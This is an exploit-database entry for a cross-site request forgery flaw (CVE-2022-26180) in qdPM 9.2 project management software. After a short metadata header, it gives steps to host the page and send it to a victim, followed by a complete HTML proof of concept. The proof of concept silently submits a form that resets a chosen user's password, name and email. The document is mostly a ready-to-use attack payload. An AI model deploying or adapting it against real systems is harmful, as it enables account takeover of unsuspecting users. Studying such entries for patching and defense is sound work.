Exploit for qdPM 9.2 Cross Site Request Forgery CVE-2022-26180

## https://sploitus.com/exploit?id=PACKETSTORM:166630
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)  
# Google Dork: NA  
# Date: 03/27/2022  
# Exploit Author: Chetanya Sharma @AggressiveUser  
# Vendor Homepage: https://qdpm.net/  
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download  
# Version: 9.2  
# Tested on: KALI OS  
# CVE : CVE-2022-26180  
#  
---------------  
  
Steps to Exploit :   
1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.  
2) send it to victim.  
  
<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">  
<input type="hidden" name="sf_method" value="put" />  
<input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly --->  
<input type="hidden" name="users[photo_preview]" value="" />  
<input type="hidden" name="users[name]" value="AggressiveUser" />  
<input type="hidden" name="users[new_password]" value="TEST1122" />  
<input type="hidden" name="users[email]" value="administrator@Lulz.com" />  
<input type="hidden" name="users[photo]" value="" />  
<input type="hidden" name="users[culture]" value="en" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>